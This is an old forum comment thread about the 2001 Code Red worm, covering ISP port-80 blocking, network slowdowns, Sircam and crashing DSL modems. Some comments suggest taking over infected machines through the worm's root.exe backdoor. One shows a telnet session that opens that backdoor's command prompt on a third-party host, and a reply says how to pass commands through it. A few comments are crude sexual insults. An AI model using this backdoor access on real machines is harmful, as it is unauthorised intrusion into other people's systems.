A virus can inflict low damage, ie: print a message on the screen that you are stupid, or a high DAMAGE rate of deleting your whole hard drive. Medium is a good measurement of this one, as it only has the POTENTIAL for data loss.

Re:It is only Medium DAMAGE!

If Symantec was concerned about security, they would realize that once a trojan is installed, you MUST assume that your data is lost, because you have no idea what other things may have been affected -- If you have a vulnerable machine hooked up to the Internet, how can you possibly know that the information stored is good?

Create a Good Virus?

[nicoz]

Why not create a good virus to interact with Code Red and force it into a benign state?

Is this possible?

Re:Create a Good Virus?

Possible, yes, but you'd still potentially get in trouble with the law.

Re:Create a Good Virus?

[Amerist+A'Toll]

Taking into account that someone else has already mentioned the concept of Code Blue, i.e. a reverse-infecting worm that takes over Code Red boxes and renders them non-scanning and prevents reinfection. This could be quite possible -- but there are many ethical concerns, and if not that, the creator of Code Blue, should they be caught and not the progenetor of Code Red may take all of the heat anyway.

Amerist A'Toll

Re:Create a Good Virus?

Instead of a virus (which spreads itself, and is illegal), why not a "patch" that simply detect an intrusion attempt by code red 2, and responds by using the backdoor to run something like 'net stop' or something else that would be hard to ignore on the infected machine. The more machines you had running this patch, the more likely it would be that you would hit one of these machines by random chance.

Re:Create a Good Virus?

In yesterday's Code Red story I saw:

Re:Apache users Create default.ida 5mb!!!! (Score:3, Interesting) by Anonymous Coward on Sunday August 05, @06:16PM PDT Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

It's entirely possible to modify this script to connect back on port 80 instead of 25. You've got a root shell on their box; the good (or evil) that can be done after that is limited only by your imagination and knowlege of winboxes.

It's about time...

[sfe_software]

I agree that cable users are causing the most damage from what I can see. I wish Road Runner (Time Warner Cable) would cut off port 80 as well. I'm logging thousands of attempts from other RR users on my firewall.

My webserver is also logging in the hundreds, mostly from various cable and DSL users. Personally I think it would be nice if they could re-enable port 80 on request for those who actually need it, but unless you're a business customer, I would think blocking port 80 temporarily would be for the greater good...

BTW, visiting most of the Road Runner IPs I'm logging, most of them don't have a page up at all. I get an IIS error about there being no "default" page... IOW, I suspect these users have no idea that they're even running IIS, much less that they're infected. Others show a page saying that too many connections are open (is this some sort of artificial limit in IIS, which depends on the license you've purchased, or is it actually an overload condition? Or an OS limitation?)

It seems like the cable networks should let their users know (this could easily be automated: "Dear Customer, you are infected with Code Red, go here...")

Besides, these people are killing my ping times in UT :)

Re:It's about time...

NT Workstation/2000 Professional does have a connection limit (of 25?) on the webserver.

Re:It's about time...

[Waffle+Iron]

I fear that at the end of the day, one of the casualties of this worm will be home-hosted web servers of any kind. IIRC, most cable modem contracts forbid running servers. However, as far as I can tell, this policy hasn't been enforced.

I'll bet that it gets strictly enforced from now on, killing all the fun even for people like me who run Apache on OpenBSD.

Re:It's about time...

[sfe_software]

I do sympathize with those who like to run webservers on their home systems. I'm always torn on these issues. For one, most users running servers are doing so quite innocently, but OTOH if the contract says no servers, they have every right to block port 80, especially when there's such a good reason.

This reminds me of the port 25 issue. I used to get so mad when an ISP would block outgoing mail, but with the massive amount of spam I receive each day, I almost think more ISPs should block port 25...

BTW, -1 Redundant, that doesn't make sense considering it was one of the first comments posted... or is it that someone disagrees with me, and modded me down unfairly?

- Jman

Re:It's about time...

What you said about most not even knowing they have a webserver up is very true. At my school, which is mostly business oriented, every other person has a laptop and some version of Windows 2000 on it, and not much on it besides AOL and PowerPoint. Afterall, they are "power users." cough.

I dont know whether W2K Pro or Advanced server install IIS by default. But if they do, the users most likely are cluless about this.

And it would suck for everyone to be denied running a webserver if only to host a resume, or work on a php/MySQL page to how off to others. I know that it is against the contract, but how many times has an ISP broken their part by limiting your bandwidth, etc. Australian Telecom being the best example.

In the end, this lumping in of IIS servers under any and every type of server will do a great disjustice to everyone.

Kind of scary

[Yorrike]

It's weird. I have a list of about 1000 machines in my Apache log that I can just log into via root.exe.

1000 machines! If this is phase 1, and phase 2 is a massive dDOS attack, the internet in in for a rough ride.

I've refrained from logging into any of those boxes, but the more the attacks roll in, the more I feel I have to do something (like bitch slap anyone stupid enough to run an unpatch IIS, or IIS full stop for that matter).

Bringing up the websites of the infected machines is always good. One of the machines in my blacklist was touting "Advanced Network Security Training". I'm still giggling at that one :)

Road runner's "warning"

[EvlPenguin]

I recieved an email today from road runner (aka time warner cable) regarding the "VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED". For the intrigued, here's the letter:
------
VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

Dear Road Runner Subscriber:

Road Runner, like many other ISPs and indeed the entire Internet, has today experienced an attack on its network which is apparently attributeable to the Code Red virus. It is possible that this virus has infected the PC's of Road Runner's subscribers using the Microsoft Windows NT or Microsoft Windows 2000 operating systems. Infected PC's may continue to flood the Internet and Road Runner's network with virus generated messages (even without your being aware of it).

Road Runner is working to alert all of its subscribers to this problem and to instruct them on where to find and install the patch necessary to eliminate the virus. In the meantime, Road Runner subscribers may experience slow network response, flashing connectivity lights on the cable modem, and other symptoms (such as unusual port scan log activity or increased firewall activity) while Road Runner and the Internet community work to control the impact of this virus.

IF YOUR PC IS RUNNING WINDOWS 2000 OR WINDOWS NT, PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE (www.microsoft.com/security) AND RESTART YOUR PC.

IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

We ask for your patience while Road Runner continues to work with the Internet community to address this virus. Thank you. Road Runner Security
P.S. Please, do not reply to this message
--------

Well, gee, if the whole "internet community" is at work at resolving the issue, I can rest easy. But then again, they only say no to worry if you're running Windows 95, 98, ME or MacOS. Well, I'm running Linux and NetBSD, so I guess I should be worried, eh?

Re:Road runner's "warning"

Too bad they forgot to tell the user to install the patch after the downloaded it before they told them to reboot.

Re:Road runner's "warning"

The worst part is that they didn't tell them their box had been r00ted and they should probably reformat.

Re:Road runner's "warning"

omg... you're right. Those morons :)

Re:Road runner's "warning"

[sharkey]

But then again, they only say no to worry if you're running Windows 95, 98, ME or MacOS. Well, I'm running Linux and NetBSD, so I guess I should be worried, eh?

No, you should report them to "abuse@timewarner.com" for sending you Unsolicted Bulk Email advertising those products.

Cutting Off Port 80?

[Bonkers54]

To specify more specifically for the people misunderstanding this poorly worded post, port 80 is not completely block. Only the _INCOMING_ connections to port 80 are block, so only people running webservers are infected. Because I currently run a webserver using Apache under Linux on my MediaOne cable modem, I am currently on hold on the MediaOne tech-support line attempting to get port 80 unblocked.

Against the DMCA?

[duncan]

From the article:

"The group gathered around the dinner table then managed to get a copy of the worm and began disassembling its code"

Doesn't looking at the code and trying to figure a way around the usage of this program violate the DMCA? I think that those at this conference should be held accountable.

Re:Against the DMCA?

[jmv]

What if somebody releases a virus and protects it under the DMCA? Does that mean it won't be legal to write an anti-virus for it? (that too could be a good way to fight DMCA)

Re:Against the DMCA?

They were in Canada.

Re:Against the DMCA?

Doesn't looking at the code and trying to figure a way around the usage of this program violate the DMCA?

Is the virus a copy protection measure? No. Now go away, please.

Cable Modem Providers

[r1ckt3r]

I work for a rather large cable modem provider in the callcenter. We are getting inunduated with calls about the code red virus. Especially concerning hyper-active activity lights on cable modems. It's been like this ever since sunday. I must admit, we are very close to blocking port 80 as well, since we don't allow web servers anyways. oh well, I start my new job next monday.

Re:Cable Modem Providers

It is not worth it. The most bandwidth I've seen being used is about 40kbps (kilobits) of ARP requests on a cable segment. 40kbps out of a possible 26Mbps on a QAM64 modulated cable segment is nothing.

@Home not blocking port 80 yet

[interiot]

@Home's AUP specifically says "no servers". Also, they've always blocked port 137, so the tools are already installed. Yet they still haven't blocked port 80, even though each IP is getting hit approximately every other minute.

Re:@Home not blocking port 80 yet

[KilljoyAZ]

If they haven't yet, they will. The customers they'd drive away by cutting off web server access probably doesn't outweigh the tech support nightmare they're facing now.

Of course, anyone intent on running a server will switch to port 8080 or something. Does Code Red port scan, or just connect to port 80?

Re:@Home not blocking port 80 yet

[muxmaster]

The contract I signed specifically said "No commercial servers." I checked this very carefully before signing it to ensure that they have no contractual right to pull my account for running a personal web server. Of course, this was when MediaOne was Roadrunner, not @Home, but they cannot unilaterally change the agreement without notice.

Re:@Home not blocking port 80 yet

[GoNINzo]

On some segments, they have. If you're on what was MediaOne's old segments, they have set it up. They just haven't admitted it yet. They say 'no servers' but they actually mean 'no servers for public use'. I personally consider every machine in my house a server... heh

Re:@Home not blocking port 80 yet

but they cannot unilaterally change the agreement without notice

Are you sure? Most contracts specifically say they CAN be unilaterally changed at any time. Although it doesn't really matter, they won't notice or care about your servers unless you use a lot of bandwidth (or are spreading worms).

Re:@Home not blocking port 80 yet

[igor_p]

I think it depends on where you are.
@home have always blocked port 80 where I live along with 137 and 139.

Re:@Home not blocking port 80 yet

[grunby]

Sure they say no servers, but a simple
route add -host 24.0.0.203 reject
works wonders

- grunby

Re:@Home not blocking port 80 yet

The AUP I signed didn't say anything about servers, only that I could not "resell @Home bandwidth", which I'm not, since I don't charge anyone for use of my server.

Re:@Home not blocking port 80 yet

[h0tb0x]

That address only scans for open news server relays because of a rash of problems with usenet. It doesn't look for anything else.

Re:@Home not blocking port 80 yet

[sharkey]

It's not likely that they will in INDY, as they are too fscking stupid here. And I'm getting hit pretty hard here, the lights on my modem would give an epileptic one hell of a time.

Thanks to Linus, Alan and all the others who made my firewall possible.

Windows related

Some companies will always try to minimize potential risk to your network if it's windows related.

This sucks

[r0ach]

I'm quite upset right now... I run a few fairly popular websites from my cable connection, and I'm not even running ISS, or Windows for that matter, so why do I (and my viewers) have to suffer? I can understand why AT&T is doing it, but still, it irks me... Just another example of Microsoft (indirectly) screwing over people that don't even use their software...

Watch Code Red infect

[iNiTiUM]

I've setup BitchX and a shell script to monitor Code Red attempts to my AT&T based apache serv. They are 100% right about at&t being nailed hard, and yes the arp traffic is thru the roof.... Irc.Piratesnet.Net on #CodeRed if anyones interested :)

Re:Watch Code Red infect

[kfuq]

No Kidding at all! Come to irc.piratesnet.net and join #codered to check it out! ! ! Current Date & Time: Tue Aug 7 16:31:16 PDT 2001 Code Red First Strain hits: 55 Code Red Second Strain hits: 2547

damage only _medium_ to self !

[cyrilc]

the problem is medium because for a user point of view, the damage is relatively low risk for the computer compare to reformating the hard drive or erasing the BIOS

who said Symantec cares for ISP and other system maniacs !!!

their only interest is to sell you the latest anti virus that can protect your Winblows <whatever> against naughty worms or viruses...

hrm. correction

[bacchusrx]

Hm. Slashdot ate part of my ping example ;p the correct command should've been:

ping xxx.xxx.xxx.xxx > /dev/null &

where xxx, etc. is your gateway's IP.

You all assumed that anyways, but... ;)

BRx.

There seems to be a newer variant

[friday2k]

or the worm has a sleeping behaviour pattern. Please review the following message from the Securityfocus Incidents Archive (the message was sent 30 minutes ago)

Re:There seems to be a newer variant

[Bender+Unit+22]

I like the way that he has remove the IP of the target, but forgot to remove it in the hex dump so that it is clearly viewable.
Not that it matters. :-)

Re:There seems to be a newer variant

[steve.simms]

That explioit is a much older one using unicode characters in the URL which was patched between SP1 and SP2.
See http://www.securityfocus.com/bid/1806 for details.
I am getting about one attempt every hour using variants on that exploit - all from address blocks in mainland China.

No change here

[NullPointer]

I'm connected through MediaOne (AT?T@Home) and I've not seen any evidence of blocking. The log has not shown a reduction in connection attempts since I first noticed something was happening Saturday afternoon, typically 1 to 4 attempts per minute. And, unlike what some others have reported, I've not seen any degradation in service. The continuous blinkin' lights are sortof annoying though.

Re:No change here

I've got AT&T @home (Connecticut), no idea who MediaOne is though :)

I also have no slowdown in attack. Port 80 is still wide open for incoming.

Re:No change here

[NullPointer]

Yeah, I'm not sure about the business details, a few months ago we were informed that MediaOne was taking over all of AT&T's broadband here in Boise. I did some checking and found that MediaOne is essentially an AT&T subsidiary (they were/are the majority stockholder). I still get the same bill from the same address, only the name has changed. If you go to MediaOne's site (http://www.mediaone.com) you simply get redirected to the AT&T broadband page.

My 'Data' Light has been going steady since Friday

[BroadbandBradley]

and I'm on @home's network. I like the program 'etherape' to sit and watch the requests come in and then browse to the IP's to see JoeBlow's homepage.
really, do these home users PAY for IIS? of course not, would you? If you're going to use software free, use free software!!!
I can't imagine that anyone who administers servers for a living hasn't already patched againts this. Thus I think most of this Code Red comes from home users windows boxes with pirated software. I wish MS did pursure those people because we'd have a whole lot more Linux users if that was the case. ( I guess that's why they don't)

a note to IIS users: /etc/httpd.conf it's not really that hard.

A Rash of very well written viruses

[Peridriga]

Along w/ Code Red (no need to explain how well this has propogated) Sircam has also caused general havoc w/ the computer's I support at work.
Yeah, it's an Outlook specific virus and now after this infection I've finally gotten my "higher up's" to get away from the Microsoft syndrome. After the intial infection, spread, and removal of Sircam I did some research and found it to be an extremly well written virus.

The intresting details:
1) Of course it does the all common spread through Outlook's address book.

Sidenote: It also attachs the last document used (gotten from the 'recent' directory) to the spread email. Which in our case luckily didn't send out any sensitive data but, more than likely could have. This also has generated a huge peak in our network traffic. (Imagine our database department (30 computers) all sending out our 200MB dBase files to every address listed)

2) Also the virus scans all of the resident HTML cache and pulls out every email address listed in it

3) Then, connects to every shared computer it can find w/ write access and infects that as well

4) And the kicker that I love so much, is that it is bi-lingual. If it detects the native systems language as Spanish it will send all the emails out en espanol.

Just a little course to those not completely familar w/ our newest addition to the viruses that plague IT specialists.

RoadRunner Fairfax VA unusable

[banky]

Here in Fairfax, our cable modem dropped out around 6pm Sunday night; it came back up after about an hour, but ever since then, I've had faster speeds on dial-up.

The phone system reports that SirCam has taken out their email servers, and that Code Red [I|II] is causing serious performance problems. They expect to have it done by tomorrow - except that today, when I called, they no longer are saying that, merely begging users to patch their systems.

Phone tech support is turned off, at least in my wanderings in the phone system.

Anyone else having these problems?

Re:RoadRunner Fairfax VA unusable

[mashy]

Yep, the Data light has been on more solidly in the last week than the Cable light has in the last year.

Don't expect Cox to do anything about it. They wouldn't know it if they had CodeRed on ams-server.

Re:RoadRunner Fairfax VA unusable

I'm in Fairfax near George mason U. Our service dropped to a crawl late Sat afternoon - and when I did reach someone in Tech support SUnday they said it was a "scheduled outage" to do some "Router updates" and they expected to have them back to standard performance by Weds. 4 Days downtime for "planned service work" yeah right. I think he was talking out of his butt, frankly. I had to dig out my old USR Courier to dial in elsewhere tonight and grab emails - and check Slashdot ... I'd try Verizon if I thought they had any more clue that Cox about connectivity - but when i truied them a year ago they were off for most of the first week, and I never gave them a second week. Isn't it interesting that these folks claim to be communications firms but don't understand the first thing about communicating with their customers.

@Home

[Micah]

Well I'm on @Home and I'm not sure if this has to do with Code Red or not, but my cable modem light indicating bandwidth use has been flashing pretty much CONSTANTLY since Sunday or so, even when the computer was off!

I know it's more than port 80 hits, because there's not a constant stream of them in my log file, and I don't even run the web server most of the time. I get plenty of them when it does run, but it's got to be more than that.

Re:@Home

[mr.+roboto]

I've got the same thing on my @Home modem--constant blinken lights, whether or not the computer is on. Still, the only DENYs in my firewall log (I've got port 80 closed off completely) are SYN packets to port 80. Not sure why this results in the contant blinking.... I'm almost certain that it can be attributed exclusively to code red, though.

Re:@Home

[h0tb0x]

We're seeing approximatly 1000-1500 arp requests per minute on any given node at the cable isp I work for as of 11am this morning, could be more by now. We aren't looking at filtering port 80 however. My receive light has been solid for 3 days because of this. Fortunatly my linux box isn't vulnerable but it's sure filling the logs nicely.

Re:fp

I'm claiming ALL your fp's because you're a spastic fuckwit AC!!

er.. wait a second...

Indirect cost.

[Fat+Casper]

With insurance companies charging more to insure companies that run MS servers and every new virus/worm headline, why do people stay there? MS doesn't cost me any money directly, but I wonder what prices out there would be lower if companies didn't need to give Bill more money that he already doesn't need.

How much better would software in general be without the anticompetitive practices, "standards" and "enhancements?" How much smoother would the net run if admins could plug all their security holes as they became known, not just when MS deigns to acknowledge that they exist and provides a band-aid? What prices out there would be lower if companies didn't have those extra costs? What profits (other than Bill's) would be higher? I'm sorry, but it just pises me off.

So that's what it is!

[Francis+Frisina]

From the "Code Red" link on E2: A red version of Mountain Dew, a soft drink second in caffeine content only to Jolt, openly marketed to the urban, minority community. The desire to penetrate minority markets was so prominent that Pepsi largely chose the drink's flavor in order to do so. At first, the company toyed with the idea of coloring the new soda blue and sticking "arctic" in the name. But conventional wisdom in the soft drink business states that people from minority groups favor sweet, fruity flavors. So, the company's researchers regrouped and came up with Wild Cherry Mountain Dew. The taste was right, but the name was too tame. Enter Code Red."

Of course, if you want to know what the Code Red Worm is, you might want to check out: http://www.everything2.com/index.pl?node_id=112673 9&lastnode_id=1037487

Re:So that's what it is!

If you're interested, the Code Red virus was named after the soft drink because the initial security group that detected and analyzed the virus used Code Red Mountain Dew to stay up all night doing the work. Just a friendly bit of trivia for anyone who thought the name of the virus a little melodramtic.

Crazy

[zexxxx]

Its just crazy that I still get hits because of this stupid virus. Just a waste of bandwidth and hdd space in log files.

I just feel that it should be reasonably complex to set up such servers. Not just for M$ which is Plug and Play (BSO.. oops... PnP) but also with linux. For example, an apt-get install of telnetd on a debian system adds the service to inetd by default, no questions asked. I don't know how other distros are like, but the consolation for linux users is that they are usually younger than grandma.

Digital Honeypots

"I noticed a sharp increase in activity," Mr. Levy said. So he set up a "honeypot," or computer intended to lure attackers, to get a copy of the worm

Oohh, A digital "honeypot" to "lure" attackers. Maybe it sends out a digital scent irresistable to worms. It's all very mysterious, but he's an expert, so I'm sure he knows what he is doing.

Or maybe it is as simple as a random ip on a cable provider like rr.com, where my port 80 was getting hammered about 1000 times an hour between 2 AM and 5 AM Sunday morning. Logs, anyone?

heh

no hablo espanol, shithead

Does the back door actually work?

% telnet 128.134.111.8 80
Trying 128.134.111.8...
Connected to 128.134.111.8.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 07 Aug 2001 22:47:22 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

It gives a command prompt, but typing commands doesn't seem to do anything...

Re:Does the back door actually work?

You have to imbed the commands within the URL.

OT: pedantic correction

[rkent]

I don't know if it works, I don't have a Win boxen to test it on...

Okay, if you're going to use the archaic, tongue-in-cheek unix-guru term "boxen," at least bother to learn that its denotation is plural.

And now back to your regularly scheduled worm discussion.

Re:OT: pedantic correction

[grammar+fascist]

This looks like a job for the Grammar Fascist.

I don't know if it works, I don't have a Win boxen to test it on...

Let's rewrite it:

I don't know if it works, I don't have a Win boxes to test it on...

That looks just fine to me.

As one of those blocked

[smnolde]

Yes I noticed this early this morning. It appears my code red hits stopped shortly after 11:05pm last night.

They might have blocked 80 from the outside world, but internal infections can still take place.

I can connect to a few IPs that affected me within the 24.163.x.x network.

On the chat with tech support they have no date when the block will be lifted.

Why code red is still around

[jerrytcow]

I was looking at my server log, and couldn't believe how many hits from the second round code red it received. I did a DNS lookup on a few of the addressed (most of the hits seem to be from 64.x.x.x). Several are from 64.4.13.232 (msgr-cs22.msgr.hotmail.com).

At first I was astounded that so many users could running IIS still unpatched, but if sites like hotmail can't patch their servers, how can we expect the average home user to?

Re:Why code red is still around

[Yorrike]

So Microsoft can't even patch their own servers? That instills a sense of confidence to no end

Damn, bloody nimrods.

Re:Why code red is still around

[RWC09]

Ant these are the people who want you to TRUST them to look after ALL your personal data!!!

Re:Why code red is still around

[Wntrmute]

Here's my favorite that attacked me.

bangalore-cache-1.cisco.com

Even Cisco won't patch their IIS servers.

RoadRunner

[mattvd]

I'm on Road Runner, and my firewall is logging between 10 and 30 requests per minute -- most of these coming from within the road runner network (24.x.x.x range).

The funniest thing though-- if you go to just about any of these IP address with a web browser, its the default page for IIS. Meaning someone set up a web server (perhaps unknowingly) and forgot about it.

Re:RoadRunner

[kalos]

Just a huge FYI but AOL/TW doesn't own the 24.x.x.x network. RoadRunner uses it just as @Home and any other cable modem service. It was the original set of IP addresses for such service.

Crikey

[Illserve]

Code red is so profligant (because it require no user intervention to spread), that a new machine installation will likely be hit by it in 10 minutes or less, which of course, is less time than it takes to patch it, which of course means that until you patch it, the remote exploitation is free to install anything else it wants until you close the hole, so you're going to be left with a zombiefied machine unless you install and patch with from an airgapped machine, using a local copy of the patch. I doubt most people do that.

So even with the patch up and available, the problem is far from solved. I bet the number of zombie machines out there surged 10fold today, many of which are on high speed corporate bandwidth, instead of the more meager cable modems with severely crippled upstream access.

It's going to be a rough year.

Re:Crikey

[interiot]

step 1: download patch
step 2: apply patch (hole plugged, no additional worms will infect)
step 3: reboot (preexisting worms disapear)

Re:Crikey

[SuperKendall]

step 1: download patch
step 1.5: Code Red III installs itself (just after install and before you can even apply a patch)
step 2: apply patch
step 2.5: Code Red III reverses patch
step 3: reboot (preexisting worms disapear, server still vulnerable)
step 4: Code Red III installs itself...

Alternate step 1.5: Remote user gets pinged from your machine by Code Red and decudes to run a format c:/ before you can patch the box.

Re:Crikey

[mcleodnine]

45 Seconds to the first infection acording to a recent msnbc article. I'm getting one hit at least every two minutes. Although that may fix the CodeRedII back door, it won't remove any trojans that may or may not have been pushed to the offending rig during active infection.

Re:Crikey

[moeman]

People keep saying that a new machine will be hit in 10 minutes. But I have had an apache server running since this started, and I have not seen a single log entry with a bunch of "XXXX"'s or "NNNN"'s. The interesting part is, it is on a college campus (which has a large summer student population). Given that all students are required to own a computer, and most of them leave it on all teh time, why haven't I seen a huge number of hits???? Anyone know?

Re:Crikey

It's "profligate", you dumbass.

Re:Crikey

[mimbleton]

Just disable damn www service until reboot with patched box.

Damage rating

[Anemophilous+Coward]

Perhaps their damage rating only refers to immediate damage done to the machine. There is no web defacement, mass amounts of files are not deleted, the drive isnt reformatted. Of course, all this *could* be done via the installed backdoor.

-A non-productive mind is with absolutely zero balance.
- AC

Re:Damage rating

[Todd+Knarr]

Then Symantec's done lost their minds. Remote root/shell access is the worst thing that can happen, because after that you're basically at the mercy of the cracker until you've sanitized the machine again. Complete destruction of the disks is nowhere near as bad as having someone who can eavesdrop on every password on your machine or steal any data he wants or alter any data he wants.

sorry

just got off the phone with your mom. she said she wants to blow you.

Possible Simple Large ISP solution

[sportal]

Can someone please tell me why the big ISPs just don't take this simple approach to handling the increased traffic by Code Red I & II.

1. Run IDS at the backbone level.
2. When you see a packet come across that is a Code Red I or II web server probe (it is real simple in detecting this), mark down the IP address.
3. Transfer the IP address to your routers and drop all packets coming from that machine for a period of time (say 2 days).

Ta da .. Suddenly you stopped all the excess traffic that is happening from these infected machines probing your network.

Better yet, why aren't they turning off the connections of machines that are infected and thus generated the majority of the traffic on their network???

Road Runner in NYC is getting a ton of traffic (mainly ARP requests from the machines looking for hosts) because of Code Red. No packet loss though.

Re:Possible Simple Large ISP solution

1. Run IDS at the backbone level.

That's not so easy.

2. When you see a packet come across that is a Code Red I or II web server probe (it is real simple in detecting this), mark down the IP address.

There is no way to detect the scan. It is a simple SYN packet to port 80. Only once it encounters a web server and delivers the payload can it be detected. Just the SYN request is what is causing the rise in ARP requests and traffic levels.

3. Transfer the IP address to your routers and drop all packets coming from that machine for a period of time (say 2 days).

Most routers are not powerful enough to check a list of several thousand hosts before forwarding a packet.

Cutting off Port 25!

[BigBlockMopar]

If @home blocks my port 80 i'll be quite pissed.

My ISP (www.dsl.ca) specifically allows you to run servers - and even rents a static IP. Then, one day recently, they surprised me by firewalling all outgoing SMTP. Of course, this coincided with a BIND change on my nameserver, and so when my mail spool started to fill up, my first assumption was that I'd killed the reverse lookup! I spent an hour or so trying to figure out how I'd gone wrong, but I didn't think I did. Finally, I contacted 'em about it. They just shut it off because there were too many spammers and they didn't want to do a mass-mailing, which would become a tech support nightmare ("uhh... this port 25 thing, do I need it?").

Anyway, I'm started to get really annoyed by Code Red II. My webserver log file is full of IIS crap. I hold Microsoft responsible for marketing a faulty product.

Yes I'm lame, I'm running IIS (patched) on my cable modem.

You are lame, for sure. You know, it's really not that much work to set up an old 486 or something with FreeBSD and NAT, add Apache from the ports collection, and laugh at all the IIS lusers. Please ditch IIS; I'll provide a helping hand if I can.

tired?

but are you as tired as your dad was after i finished fucking him in the ass?

No patch for Alpha NT 4 machines

[BrookHarty]

No patch for Alpha NT4 machines. I had to remove Indexing, no big deal, but damn virus even hit Alpha cpus.

Re:No patch for Alpha NT 4 machines

what? shouldn't the worm be in x86 code?

to block codered on the firewall

[atif_ghaffar]

Our webservers have also been getting requests for default.ida stuff. I have written a couple of short scripts to block them on the firewall. The scripts are avaialable at http://www.ispman.org/blockcodered

Re:What ports does the worm attack?

Depends. If you are on a modem, you will see an occasional SYN packet with a destination port 80. If you are on a cable modem or shared segment that is accessible to the Internet, you will see a lot of ARP requests for nonexistant machines along with the SYN packets. If it hits a machine with a web server on it, you will see the mailicious URL (its payload) sent to the host.

well in that case...

i'll happily reward it to you :-)

CISCO DSL Modem Getting Hammered?

[Dasein]

I've had to reboot my cable modem recently every night to restore connectivity. My ISP just sent out an email saying the CISCO cable modem that I'm using hammered by Code Red.

Here's the quote "With the Cisco 67x series, as well as HP print servers, 3Com switches, and almost all other embedded web server applications, the worm causes a buffer overrun which causes the device to lock up."

Is this really true? It seems pretty unlikely that almost all embedded web server application have a buffer overrun. It seems possible that a few devices do.

Anybody have more info?

Re:CISCO DSL Modem Getting Hammered?

Qwest's DSL service [both to their Qwest.net customers and folks using them for service and someone else for ISPs] has the exact same issue with the Cisco 67x gear. I had to go into my box and do a "web disable" in order to keep it from crashing every few minutes.

Of course, that was last month.

Re:CISCO DSL Modem Getting Hammered?

Here in Minneapolis our Cisco 675 locks up 15 times a day. Our ISP ( Qwest ) has huge waits on there support line. Thier web site has no information about the issue. Another example of the great customer service from a local monopoly.

Re:CISCO DSL Modem Getting Hammered?

Actually one of Qwest's users has an excellent
page up:

http://www.users.qwest.net/~rlutton/ADSL/

And see Qwest's site here:

http://www.qwest.com/dsl/customerservice/redcode vi rus.html

Re:CISCO DSL Modem Getting Hammered?

[kfuq]

I am TOTALLY FED UP with qwest. Everytime i call the tech line.. "you're expected hold time is 114minutes" This is Horrible customer service! I have been having to reboot my modem 40-50x/day! They said that they have a "fix" for the cisco modems, by changing the web port on the modem, but that s**t dosen't werk at all, so don't let 'em tell ya different .. TO TOP IT ALL OFF .. They are partering up with M$ ... Oh boy what fun. Guess money rules and all resembleance of common sense is right the hell out the window. Time to get a different isp i believe.. check out out real-time code red display.. irc.piratesnet.net and join #codered

Re:CISCO DSL Modem Getting Hammered?

Visit http://www.seanet.com/help/codered.shtml Qwest is a bunch of morons and most of your "cheap" ISP's are as well. I'm biased because I work for Seanet. We charge more but you get what you pay for. We figured out the fix 2 days before Qwest did.

Re:CISCO DSL Modem Getting Hammered?

[Peter+H.S.]

I've had to reboot my cable modem recently every night to restore connectivity. My ISP just sent out an email saying the CISCO cable modem that I'm using hammered by Code Red.

Here?s the quote ?With the Cisco 67x series, as well as HP print servers, 3Com switches, and almost all other embedded web server applications, the worm causes a buffer overrun which causes the device to lock up.?

Is this really true? It seems pretty unlikely that almost all embedded web server application have a buffer overrun. It seems possible that a few devices do.

Anybody have more info?

Well Cisco has put out a advisory for 'unpatched' 6xx DSL modems.
see:
http://www.cert.org/advisories/CA-2001-19.html
However, the Cisco problems are not the same as the MS buffer overflow, but are triggered by the CR scanning nevertheless.

I have seen several mentionings of other types of equipment, there seems to react badly to CR scanning.Probably because it is "easy" to give a piece of equipment an IP address and a web-server for remote mangement. But most of this equipment was designed to operate inside a nice and friendly LAN, serving well-formed requests. Of course, not all embedded web servers suffers under the CR scanning,and those who are, are probably affected by reboot requering memory leaks, caused by high load.

The scaring truth probably is, that security, as usual, wasn't high on the list when all those devices was designed.

Security is hard to design and maintain, but also hard to sell to costumers.

Sites running transparent proxies, (from MS-proxy, MS-ISA?, Cisco, Squid, etc), may experience severe resource depletetion if infected. See http://archives.neohapsis.com/archives/bugtraq/200 1-08/0078.html
Other products using "embedded" MS ISS are affected too.

What is thoughprovoking about CRII, is its spreading algorithm, favoring IP addresses close to the infected host. This is of course much more effecient than random numbers, but also seems make it easier for it, to infect hosts _inside a LAN_ on "misconfigured" networks:

Host A on the inside LAN /DMZ cannot be reached directly from the Internet, but it "trusts" Host B, on the hostile Internet.So when Host B is infected, Host A gets it too, and starts spreading the infection deep into the LAN.

And in my experience, hosts and equipment inside the LAN, is rarely patched and tied down with the same vigour as Internet hosts.

It is of course bad nework design that allow this to happend, but a lot of sites are nevertheless configured that way, because it makes things easier.

Re:CISCO DSL Modem Getting Hammered?

I'm running 2.4.1 on my Cisco 675 DSL device. It was crashing several times a day, despite having "web disable". I had to also change the web port to something other than 80...I guess the 675 accepts the packet, then checks if the port is disabled...or it would if it hadn't crashed already.

mediaone (at&t broadband) has not cut access

[self+assembled+struc]

I'm on a cable modem in boston and my server is responding just fine on all my ports.

Re:mediaone (at&t broadband) has not cut access

[EvilMagnus]

I'm in Boston, on Mediaone/ATT, and they're blocking port 80 at the first point they can : somewhere *upstream* of your local node. I can get to port 80 from either side of my router, and get to other folks' web sites in my subnet (gee, thanks, CodeRedII, for 500+ unique IPs of infected MORONS on my subnet!). BUT I can't connect to TCP80 on my server from off the ATT network.

They started blocking the Cambridge branch several days ago, according to my tests and my logs.

It happened to me and I know better

[Hangtime]

Preface: I know better, I know what Code Red can do, hell I work in IT so it makes even worse

I recently started with my company right out of college and one of my jobs is to optimize queries running against an MSSQL Server. I also own a couple of HDs so I bought trays so I can switch systems without putting my eval copy of SQL on my production system. After installation, I went onto the Internet to start downloading patches and then left because Im on a 28.8 modem. When I came back I found that I had sent over 6MB and only dl 2.5 and Inetinfo.exe was going nuts. Shit I thought, I got infected. Like I said it can happen to anyone even when your trying to do the right thing and get all patched up.

HT

Port 80 blocking on AT&T (aka Mediaone segment)

[GoNINzo]

